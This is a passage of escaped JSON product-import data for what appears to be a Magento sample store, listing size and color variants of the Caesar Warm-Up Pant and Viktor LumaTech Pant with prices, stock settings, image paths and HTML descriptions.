nable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Purple\"},\"687\":{\"sku\":\"MP01-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-36-Black\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"688\":{\"sku\":\"MP01-36-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-36-Gray\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-36-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Gray\"},\"689\":{\"sku\":\"MP01-36-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-36-Purple\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-36-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Purple\"},\"690\":{\"sku\":\"MP01\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Sweatpants|Track Pants,material=CoolTech&trade;|Fleece|Hemp|Wool,pattern=Solid,climate=Cool|Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MP01-32-Black,size=32,color=Black|sku=MP01-32-Gray,size=32,color=Gray|sku=MP01-32-Purple,size=32,color=Purple|sku=MP01-33-Black,size=33,color=Black|sku=MP01-33-Gray,size=33,color=Gray|sku=MP01-33-Purple,size=33,color=Purple|sku=MP01-34-Black,size=34,color=Black|sku=MP01-34-Gray,size=34,color=Gray|sku=MP01-34-Purple,size=34,color=Purple|sku=MP01-36-Black,size=36,color=Black|sku=MP01-36-Gray,size=36,color=Gray|sku=MP01-36-Purple,size=36,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Sweatpants|Track Pants\",\"material\":\"CoolTech&trade;|Fleece|Hemp|Wool\",\"pattern\":\"Solid\",\"climate\":\"Cool|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"691\":{\"sku\":\"MP02-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-32-Blue\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"692\":{\"sku\":\"MP02-32-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-32-Gray\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-32-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Gray\"},\"693\":{\"sku\":\"MP02-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-32-Red\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"694\":{\"sku\":\"MP02-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-33-Blue\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"695\":{\"sku\":\"MP02-33-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; 